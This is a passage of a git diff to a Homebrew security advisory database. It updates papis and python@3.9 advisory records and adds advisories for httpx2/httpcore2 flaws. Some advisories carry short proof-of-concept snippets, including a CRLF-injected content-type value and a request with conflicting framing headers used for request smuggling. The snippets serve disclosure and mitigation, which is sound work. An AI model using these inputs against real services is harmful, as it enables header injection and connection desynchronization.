"urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-25645.json b/advisories/BREW-papis-CVE-2026-25645.json index 8d453630fa9..b8ba21f6137 100644 --- a/advisories/BREW-papis-CVE-2026-25645.json +++ b/advisories/BREW-papis-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-25645", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-41066.json b/advisories/BREW-papis-CVE-2026-41066.json index c9aa1e81e97..9fd3b0fa5e4 100644 --- a/advisories/BREW-papis-CVE-2026-41066.json +++ b/advisories/BREW-papis-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-41066", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.1.0", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2026-44431.json b/advisories/BREW-papis-CVE-2026-44431.json index ea8479b67fb..c3008947444 100644 --- a/advisories/BREW-papis-CVE-2026-44431.json +++ b/advisories/BREW-papis-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-44431", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-44432.json b/advisories/BREW-papis-CVE-2026-44432.json index e7132c6d4c2..d5c53649bbb 100644 --- a/advisories/BREW-papis-CVE-2026-44432.json +++ b/advisories/BREW-papis-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-44432", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-4539.json b/advisories/BREW-papis-CVE-2026-4539.json index 9ac9b64bc7a..58bd4143565 100644 --- a/advisories/BREW-papis-CVE-2026-4539.json +++ b/advisories/BREW-papis-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-4539", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-45409.json b/advisories/BREW-papis-CVE-2026-45409.json index 9251747be28..6cacafc1ff2 100644 --- a/advisories/BREW-papis-CVE-2026-45409.json +++ b/advisories/BREW-papis-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-45409", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-49476.json b/advisories/BREW-papis-CVE-2026-49476.json index 75819c4cf85..145d1cf2d9a 100644 --- a/advisories/BREW-papis-CVE-2026-49476.json +++ b/advisories/BREW-papis-CVE-2026-49476.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-49476", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-2wc2-fm75-p42x", "CVE-2026-49476", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.2", - "key": "pkg:pypi/soupsieve@2.9.2", - "resource": "soupsieve" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-49477.json b/advisories/BREW-papis-CVE-2026-49477.json index 4ade6591e29..336f6759648 100644 --- a/advisories/BREW-papis-CVE-2026-49477.json +++ b/advisories/BREW-papis-CVE-2026-49477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-49477", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-836r-79rf-4m37", "CVE-2026-49477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.2", - "key": "pkg:pypi/soupsieve@2.9.2", - "resource": "soupsieve" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-7246.json b/advisories/BREW-papis-CVE-2026-7246.json index 32a3c4a8517..10730b0d235 100644 --- a/advisories/BREW-papis-CVE-2026-7246.json +++ b/advisories/BREW-papis-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-7246", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:19:42Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-papis-CVE-2026-84378.json b/advisories/BREW-papis-CVE-2026-84378.json new file mode 100644 index 00000000000..5966a899259 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84378", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84379.json b/advisories/BREW-papis-CVE-2026-84379.json new file mode 100644 index 00000000000..1094ff6ebf9 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84379", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84380.json b/advisories/BREW-papis-CVE-2026-84380.json new file mode 100644 index 00000000000..d1c131c3676 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84380", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84381.json b/advisories/BREW-papis-CVE-2026-84381.json new file mode 100644 index 00000000000..daac4d0a001 --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84381", + "published": "2026-09-10T20:21:26Z", + "modified": "2026-09-10T20:21:26Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-papis-CVE-2026-84382.json b/advisories/BREW-papis-CVE-2026-84382.json new file mode 100644 index 00000000000..2cff0ae5ecc --- /dev/null +++ b/advisories/BREW-papis-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-papis-CVE-2026-84382", + "published": "2026-09-10T20:21:27Z", + "modified": "2026-09-10T20:21:27Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "papis", + "purl": "pkg:brew/papis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.15.0_5" + }, + { + "fixed": "0.16.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-python@3.9-CVE-2013-1629.json b/advisories/BREW-python@3.9-CVE-2013-1629.json index 0ea001c82a8..b896a3f3842 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1629.json +++ b/advisories/BREW-python@3.9-CVE-2013-1629.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1629", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-g3p5-fjj9-h8gj", "CVE-2013-1629", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pip", - "subject_version": "25.3", - "key": "pkg:pypi/pip@25.3", - "resource": "pip" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-1633.json b/advisories/BREW-python@3.9-CVE-2013-1633.json index b3de61d8f93..77a6afdbcff 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1633.json +++ b/advisories/BREW-python@3.9-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-python@3.9-CVE-2013-1633", "published": "2026-08-13T17:29:58Z", - "modified": "2026-08-13T17:29:58Z", + "modified": "2026-09-10T20:33:57Z", "upstream": [ "GHSA-27x4-j476-jp5f", "CVE-2013-1633", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.9.0", - "key": "pkg:pypi/setuptools@80.9.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-python@3.9-CVE-2013-1888.json b/advisories/BREW-python@3.9-CVE-2013-1888.json index e83755de33d..bfcb1a4568d 100644 --- a/advisories/BREW-python@3.9-CVE-2013-1888.json +++ b/advisories/BREW-python@3.9-CVE-2013-1888.json @@ -2,7 +2,7 